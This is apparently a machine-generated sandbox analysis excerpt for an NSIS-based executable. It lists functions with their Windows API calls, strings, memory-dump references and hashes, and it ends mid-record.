windowmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404DE4
GetDlgItem.USER32(?,00000408), ref: 00404DEF
GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
LoadBitmapW.USER32(0000006E), ref: 00404E4C
SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
DeleteObject.GDI32(00000000), ref: 00404EC2
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
ShowWindow.USER32(?,00000005), ref: 0040501C
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
ImageList_Destroy.COMCTL32(?), ref: 004051EC
GlobalFree.KERNEL32(?), ref: 004051FC
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
InvalidateRect.USER32(?,00000000,?), ref: 0040534D
ShowWindow.USER32(?,00000000), ref: 0040539B
GetDlgItem.USER32(?,000003FE), ref: 004053A6
ShowWindow.USER32(00000000), ref: 004053AD

Strings

, xrefs: 00405385
M, xrefs: 00404F76
N, xrefs: 00405057

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
Opcode Fuzzy Hash: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58

Function 00405AFA Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76133180,00000000), ref: 00405B23
lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76133180,00000000), ref: 00405B6B
lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76133180,00000000), ref: 00405B8E
lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76133180,00000000), ref: 00405B94
FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76133180,00000000), ref: 00405BA4
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
FindClose.KERNEL32(00000000), ref: 00405C53

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B08
\*.*, xrefs: 00405B65
0WB, xrefs: 00405B53

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: 0WB$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-3035347311
Opcode ID: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
Opcode Fuzzy Hash: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE

Function 00406AF2 Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45

Function 0040672B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,?,?,76133180,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76133180), ref: 00406736
FindClose.KERNEL32(00000000), ref: 00406742

Strings

xgB, xrefs: 0040672C

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: xgB
API String ID: 2295610775-399326502
Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C

Function 00401E49 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401E67
EnableWindow.USER32(00000000,00000000), ref: 00401E72

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
Instruction ID: b41365517dadb09c69eaf87789fd34eb77fb4a5ff64ddc4fb458d6156a5e0ce1
Opcode Fuzzy Hash: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
Instruction Fuzzy Hash: DFE0DF32E08200CFE724EFA5AA494AD77B4EB80324B20847FF201F11D1CE7858818F6E

Function 00403E86 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
ShowWindow.USER32(?), ref: 00403EDF
DestroyWindow.USER32 ref: 00403EF3
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
GetDlgItem.USER32(?,?), ref: 00403F30
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
IsWindowEnabled.USER32(00000000), ref: 00403F4B
GetDlgItem.USER32(?,?), ref: 00403FF9
GetDlgItem.USER32(?,00000002), ref: 00404003
SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
SendMessageW.USER32(0000040F,00000000,?,?), ref: 0040406E
GetDlgItem.USER32(?,00000003), ref: 00404114
ShowWindow.USER32(00000000,?), ref: 00404135
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404147
EnableWindow.USER32(?,?), ref: 00404162
GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00404178
EnableMenuItem.USER32(00000000), ref: 0040417F
SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404197
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
SetWindowTextW.USER32(?,00423728), ref: 004041E8
ShowWindow.USER32(?,0000000A), ref: 0040431C

Strings

(7B, xrefs: 004041C4

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: (7B
API String ID: 3282139019-3251261122
Opcode ID: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
Opcode Fuzzy Hash: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D

Function 00403AD8 Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF

lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\,761336C0,00435000,00000000), ref: 00403B59
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BD9
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
GetFileAttributesW.KERNEL32(Call), ref: 00403BF7
LoadImageW.USER32(00000067,?,00000000,00000000,00008040,00435800), ref: 00403C40

Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C

RegisterClassW.USER32(004291E0), ref: 00403C7D
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
ShowWindow.USER32(00000005,00000000), ref: 00403D00
GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
RegisterClassW.USER32(004291E0), ref: 00403D42
DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403AE4
RichEdit, xrefs: 00403D33
.DEFAULT\Control Panel\International, xrefs: 00403B44
(7B, xrefs: 00403B04
RichEdit20W, xrefs: 00403D24, 00403D2A
1033, xrefs: 00403AF8, 00403B54
Call, xrefs: 00403BA0, 00403BA9, 00403BB7, 00403C06, 00403C0C
_Nb, xrefs: 00403C5C, 00403CC4
RichEd20, xrefs: 00403D06
.exe, xrefs: 00403BE6
RichEd32, xrefs: 00403D14
Control Panel\Desktop\ResourceLocale, xrefs: 00403B0C

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: (7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-2903015321
Opcode ID: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
Opcode Fuzzy Hash: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D

Function 00402F30 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402F44
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\6ZoBPR3isG.exe,00000400), ref: 00402F60

Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\6ZoBPR3isG.exe,80000000,00000003), ref: 00405EE2
Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F04

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\Desktop\6ZoBPR3isG.exe,C:\Users\user\Desktop\6ZoBPR3isG.exe,80000000,00000003), ref: 00402FA9
GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030F0

Strings

C:\Users\user\Desktop\6ZoBPR3isG.exe, xrefs: 00402F4A, 00402F59, 00402F6D, 00402F8A
C:\Users\user\AppData\Local\Temp\, xrefs: 00402F3D, 00403108
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
Error launching installer, xrefs: 00402F80
soft, xrefs: 00403020
Inst, xrefs: 00403017
Null, xrefs: 00403029

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\6ZoBPR3isG.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-1635470676
Opcode ID: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
Opcode Fuzzy Hash: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD

Function 0040640A Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040654B
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004065A8
CoTaskMemFree.OLE32(00000000), ref: 004065B3
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
lstrlenW.KERNEL32(Call,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 0040651B
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004065D3
Call, xrefs: 00406434, 0040650F, 00406516, 0040651A, 00406534, 00406535, 0040654A, 0040655D, 00406579, 004065A4, 004065D8, 004065DE, 004065FA, 0040660D, 0040662A, 00406630, 0040663C, 0040666F

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-1230650788
Opcode ID: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
Opcode Fuzzy Hash: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,Call,00436000,?,?,00000031), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00436000,?,?,00000031), ref: 004017D5

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5

Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

Strings

C:\Users\user\AppData\Local\Temp\nsz9A57.tmp, xrefs: 00401821, 0040183F
Call, xrefs: 0040178D, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Temp\nsz9A57.tmp\System.dll, xrefs: 00401835, 00401851

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsz9A57.tmp$C:\Users\user\AppData\Local\Temp\nsz9A57.tmp\System.dll$Call
API String ID: 1941528284-2512166951
Opcode ID: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
Opcode Fuzzy Hash: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E

Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026F1
SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 00402714
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040272A

Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405FD5

SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D6

Strings

9, xrefs: 00402699

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
